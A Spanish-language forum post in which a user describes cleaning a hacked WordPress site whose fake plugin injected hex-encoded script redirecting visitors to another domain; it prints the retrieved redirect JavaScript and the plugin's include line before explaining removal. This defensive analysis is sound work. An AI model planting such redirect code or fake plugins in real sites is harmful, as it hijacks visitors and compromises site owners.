Desinfectando un Wordpress

Iniciado por ANTRAX, Septiembre 26, 2017, 04:57:26 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.


Como todos saben, Wordpress es un CMS que vive actualizándose constantemente, cuando no lo actualizamos, corremos riesgos de que alguien pueda entrar y manipular el sitio a su gusto. El día de ayer me llamó un cliente con que su sitio web hecho en wordpress, redireccionaba a otra URL. En este caso su sitio web redirecciona a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Me pasé un buen rato googleando y no encontré nada al respecto, es por ello que me puse a investigar un poco más el comportamiento del sitio.
Revisando el FTP, me topé con carpetas que no tenían nada que ver con Wordpress


Obviamente el sitio había sido infectado y tenía un script que redireccionaba a otro sitio.
El paso siguiente fue borrar todos esos directorios, para ver si así podía evitar la redirección, pero no funcionó. Es por ello que acudí al depurador de Firefox.

Algo a aclarar, es que esta redirección solo se realizaba 1 sola vez, por lo que para volver a ver esta anomalía, debía limpiar caché o entrar con la navegación privada.

Al inspeccionar el comportamiento de la página, me topé con esto:


Me pareció muy raro... estaba todo en hexadecimal... decidí pasar todo a ASCII para saber de que se trataba


Como se puede ver en la imagen, era un script que ejecutaba la URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Al entrar a esa URL me topé con lo siguiente:

Código: javascript
function process() {
                window.location = "http://gualdacatas.com/";
            }
            window.onerror = process;
            process();


Que es justamente a la web que me estaba redireccionando... Teniendo esto, ya tenía más herramientas para Googlear. Y me topé con que "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" es un falso plugin de Wordpress llamado _bb_press que redirecciona a otros sitios, como pornográficos, entre otros...

Ahora viene la parte divertida... Encontrar y romper esa redirección.

Al tratarse de un Plugin falso, simplemente fui directo al directorio de plugins que está en wp-content/plugins y me encontré con uno llamado press_test515215 por razones obvias, supe que era ese.


Al entrar a la carpeta de ese plugin, había un archivo llamado press_test515215.php en su interior incluía a otro archivo más

Código: php
include(dirname(__FILE__) . '/includes/_bb_press_plugin.class.php');


Al abrir este Segundo archivo me topé con esto:


Y ahí lo tienen! Esa era la redirección que estaba haciendo el Wordpress. Solucionarlo fue fácil. Solo basta con borrar el plugin y el sitio dejará de redireccionar.

Espero que les sea de utilidad!
ANTRAX


Muy bueno, me servira para inminentes auditorias  :D


saludos!